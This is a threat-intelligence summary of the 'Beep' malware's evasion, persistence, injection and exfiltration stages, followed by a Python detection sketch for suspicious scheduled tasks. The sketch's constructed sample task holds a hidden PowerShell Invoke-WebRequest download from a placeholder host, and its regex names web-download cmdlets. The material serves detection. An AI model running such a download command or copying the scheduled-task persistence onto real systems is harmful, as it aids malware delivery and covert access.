New Sneaky 'Beep' Malware
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Minerva
A malware tracked as "Beep" displays numerous evasion techniques to maintain stealth on the infected host. Researchers from Minerva spotted the malware on VirusTotal and were intrigued because the samples were tagged as "spreader", yet VirusTotal did not appear to be able to retrieve the files dropped by the malware. Minerva's analysis found various evasion techniques, including anti-VM and anti-analysis techniques intended to thwart inspection by security software. The malware takes its name from the Beep API function it calls to delay its execution. The malware consists of three components: the dropper, the injector, and the payload. The DLL dropper establishes persistence in the registry and creates a scheduled task that executes a PowerShell script every 13 minutes. When the script runs, the injector is downloaded and launched, injecting itself into a legitimate system process to evade detection. Lastly, the Beep payload is dropped to collect system information and exfiltrate the data to the attacker's command and control (C2) server. During Minerva's analysis the C2 server had already been taken down; even so, "the malware continued to collect more data, even after 120 failed attempts to send the data." Despite the malware's effective array of evasion and anti-analysis capabilities, it is assessed to be in active development, so its capabilities will only grow in future iterations.
- Malicious EXE/DLL Abuses LOLBins for Evasion
Anvilogic Use Cases:
- Suspicious File written to Disk
- Rare Schedule Task Created
- Invoke-WebRequest Command
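A detection sketch for the persistence step described above (a scheduled task that runs a PowerShell script every 13 minutes to download the injector), covering the "Rare Schedule Task Created" and "Invoke-WebRequest Command" use cases together. This is an added example, not code from Minerva's report or Anvilogic's content: it parses a Task Scheduler definition such as the TaskContent field of Windows Security Event 4698 and flags a short repetition interval combined with a PowerShell web-download action. The sample task XML, the 15-minute threshold and the URL are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (as seen in Event ID 4698 TaskContent)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHORT_INTERVAL_MIN = 15  # assumed threshold: repeats this frequent or faster are "rare" for admin tasks
WEB_CMDLETS = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)

def iso_duration_minutes(value):
    """Convert an ISO 8601 duration such as PT13M or PT1H30M to minutes (None if unparsable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60

def analyze_task(task_xml):
    """Extract the shortest repetition interval and the Exec actions of one task definition."""
    root = ET.fromstring(task_xml)
    intervals = [iso_duration_minutes(e.text) for e in root.findall(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    exec_cmds = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        exec_cmds.append(f"{cmd} {args}".strip())
    joined = " ".join(exec_cmds)
    return {
        "min_interval_min": min(intervals) if intervals else None,
        "runs_powershell": bool(re.search(r"powershell(\.exe)?|pwsh", joined, re.I)),
        "web_request": bool(WEB_CMDLETS.search(joined)),
        "commands": exec_cmds,
    }

def is_suspicious(task_xml):
    """True when a frequently repeating task launches PowerShell that fetches content from the web."""
    ind = analyze_task(task_xml)
    frequent = ind["min_interval_min"] is not None and ind["min_interval_min"] <= SHORT_INTERVAL_MIN
    return frequent and ind["runs_powershell"] and ind["web_request"]

# Constructed sample: Beep-style task (13-minute repeat, PowerShell download); URL is a placeholder
BEEP_LIKE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT13M</Interval></Repetition>
    <StartBoundary>2023-02-01T10:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-w hidden -c "Invoke-WebRequest http://PLACEHOLDER.invalid/x -OutFile $env:TEMP\\x"</Arguments>
  </Exec></Actions></Task>"""
# Constructed sample: routine hourly PowerShell maintenance task with no web request
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command><Arguments>-File C:\\Scripts\\cleanup.ps1</Arguments></Exec></Actions></Task>"""
```

In a real pipeline the same logic runs over each 4698 event's TaskContent, with the interval threshold tuned to the baseline of scheduled tasks in the environment.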